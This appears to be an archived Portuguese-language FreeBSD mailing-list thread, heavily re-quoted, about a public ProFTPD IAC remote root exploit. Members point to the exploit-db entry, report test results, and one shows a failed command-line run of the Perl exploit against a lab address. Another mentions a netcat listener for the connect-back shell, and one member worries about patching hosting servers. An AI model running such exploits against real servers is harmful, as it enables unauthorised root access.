Re: [FUG-BR] ProFTPD IAC Remote Root Exploit
Boa tarde Srs. Executei no CentOS 5.5 ProFTP 1.3.2 (stable), não rolou... er...@erick-desktop:~/Sistemas/exploits/proftp$ perl 15449.pl 10.100.100.107 10.100.100.152 12 [10.100.100.107] CentOS 5, ProFTPD 1.3.2e Server (Plesk binary) :pP align = 8189 Seeking for write(2).. Using write offset 0804c290. Can't call method sockopt on an undefined value at 15449.pl line 255. Em 8 de novembro de 2010 02:54, Leonardo Rota Botelho leonardobote...@gmail.com escreveu: Boa noite/dia, Para quem não viu ainda... ProFTPD IAC Remote Root Exploit http://www.exploit-db.com/exploits/15449/ Testei com... FreeBSD 8.1 i386, ProFTPD 1.3.3a FreeBSD 8.0 i386, ProFTPD 1.3.2a como descrevia o exploit. http://www.leonardobotelho.com/blog/2010/11/proftpd-iac-remote-root-exploit/ abs! -- Leonardo Rota Botelho http://www.leonardobotelho.com/blog/ public key: http://www.leonardobotelho.com/leonardorotabotelho.gpg - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd -- Linux user: 478061 Google Talk : erick@gmail.com MSN : eric...@msn.com Skype: erick.lzr Erick Rodrigo Lazaro - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] ProFTPD IAC Remote Root Exploit
Voce abriu netcat pra escutar na porta 45... alguma coisa? 2010/11/10 Erick Rodrigo erick@gmail.com Boa tarde Srs. Executei no CentOS 5.5 ProFTP 1.3.2 (stable), não rolou... er...@erick-desktop:~/Sistemas/exploits/proftp$ perl 15449.pl10.100.100.107 10.100.100.152 12 [10.100.100.107] CentOS 5, ProFTPD 1.3.2e Server (Plesk binary) :pP align = 8189 Seeking for write(2).. Using write offset 0804c290. Can't call method sockopt on an undefined value at 15449.pl line 255. Em 8 de novembro de 2010 02:54, Leonardo Rota Botelho leonardobote...@gmail.com escreveu: Boa noite/dia, Para quem não viu ainda... ProFTPD IAC Remote Root Exploit http://www.exploit-db.com/exploits/15449/ Testei com... FreeBSD 8.1 i386, ProFTPD 1.3.3a FreeBSD 8.0 i386, ProFTPD 1.3.2a como descrevia o exploit. http://www.leonardobotelho.com/blog/2010/11/proftpd-iac-remote-root-exploit/ abs! -- Leonardo Rota Botelho http://www.leonardobotelho.com/blog/ public key: http://www.leonardobotelho.com/leonardorotabotelho.gpg - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd -- Linux user: 478061 Google Talk : erick@gmail.com MSN : eric...@msn.com Skype: erick.lzr Erick Rodrigo Lazaro - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] ProFTPD IAC Remote Root Exploit
Opa! abri sim... Pode ser meu perl, pois deu erro na função sockopt... Ainda não tem correção pra essa falha, neh?! Estou preocupado, pois uso o ProFTPD nos servidores de hospedagem... Em 10 de novembro de 2010 17:08, Oscar Marques osca...@gmail.com escreveu: Voce abriu netcat pra escutar na porta 45... alguma coisa? 2010/11/10 Erick Rodrigo erick@gmail.com Boa tarde Srs. Executei no CentOS 5.5 ProFTP 1.3.2 (stable), não rolou... er...@erick-desktop:~/Sistemas/exploits/proftp$ perl 15449.pl10.100.100.107 10.100.100.152 12 [10.100.100.107] CentOS 5, ProFTPD 1.3.2e Server (Plesk binary) :pP align = 8189 Seeking for write(2).. Using write offset 0804c290. Can't call method sockopt on an undefined value at 15449.pl line 255. Em 8 de novembro de 2010 02:54, Leonardo Rota Botelho leonardobote...@gmail.com escreveu: Boa noite/dia, Para quem não viu ainda... ProFTPD IAC Remote Root Exploit http://www.exploit-db.com/exploits/15449/ Testei com... FreeBSD 8.1 i386, ProFTPD 1.3.3a FreeBSD 8.0 i386, ProFTPD 1.3.2a como descrevia o exploit. http://www.leonardobotelho.com/blog/2010/11/proftpd-iac-remote-root-exploit/ abs! -- Leonardo Rota Botelho http://www.leonardobotelho.com/blog/ public key: http://www.leonardobotelho.com/leonardorotabotelho.gpg - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd -- Linux user: 478061 Google Talk : erick@gmail.com MSN : eric...@msn.com Skype: erick.lzr Erick Rodrigo Lazaro - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd -- Linux user: 478061 Google Talk : erick@gmail.com MSN : eric...@msn.com Skype: erick.lzr Erick Rodrigo Lazaro - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
[FUG-BR] ProFTPD IAC Remote Root Exploit
Boa noite/dia, Para quem não viu ainda... ProFTPD IAC Remote Root Exploit http://www.exploit-db.com/exploits/15449/ Testei com... FreeBSD 8.1 i386, ProFTPD 1.3.3a FreeBSD 8.0 i386, ProFTPD 1.3.2a como descrevia o exploit. http://www.leonardobotelho.com/blog/2010/11/proftpd-iac-remote-root-exploit/ abs! -- Leonardo Rota Botelho http://www.leonardobotelho.com/blog/ public key: http://www.leonardobotelho.com/leonardorotabotelho.gpg - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd